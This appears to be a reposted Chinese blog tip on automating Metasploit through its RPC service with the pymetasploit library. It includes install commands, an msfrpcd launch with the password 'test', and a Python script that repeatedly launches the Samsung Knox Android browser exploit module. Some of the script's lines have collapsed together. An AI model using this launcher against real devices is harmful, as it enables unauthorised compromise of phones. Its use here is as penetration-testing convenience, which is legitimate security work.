分享一個metasploit快速測試腳本的TIPS

jopen 9年前發布 | 5K 次閱讀 Python

相信用過metasploit的同學都很苦逼,msfconsole漫長的啟動時間,如果測試中敲錯命令,或不小心退出后又重啟任務,會讓你直接抓狂。之前不想重復敲命令,看了下metasploit的開發文檔,發現要自動化有各種方案,個人感覺最方便的是調用RPC接口,GITHUB上搜了把,發現有大拿封裝好了模塊,直接調用即可:


1.安裝pymetasploit模塊
git clone https://github.com/allfro/pymetasploit
</div>

切到目錄

sudo python setup.py install


2.啟動metasploit的RPC服務

msfrpcd -P test -n -f -a 127.0.0.1

這個test是rpc服務的密碼,用戶名默認是msf


3.定制自己的測試腳本

我這里定制的是測試三星knox漏洞的腳本,思路是每次啟動先把之前運行的job和console停掉,然后自動創建一個console自動敲入命令進行新的漏洞測試,直接crtl-c結束腳本再重新測試都是一個新的job,而且每次測試都是秒開,不用再重啟msfconsole了。中間各種接口怎么用,推薦大家再翻下官方的文檔。


from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.call('job.list')
for num in jobs.keys():
    if jobs[num].find('samsung_knox_smdm_url')>0:
        client.call('job.stop',num)

console = client.call('console.list') for _console in console['consoles']: if _console.has_key('prompt'): if _console['prompt'].find('samsung_knox_smdm_url')>0: client.call('console.destroy', _console['id'])

cmd=''' use exploit/android/browser/samsung_knox_smdm_url set LHOST 127.0.0.1 exploit ''' res = client.call('console.create') console_id = res['id'] client.call('console.write', console_id, cmd) try: while True: res = client.call('console.read',console_id) if len(res['data']) > 1: print res['data'], if res['busy'] == True: time.sleep(1) continue except: pass</pre>
來自:http://weibo.com/p/1001603795720149837992

 本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!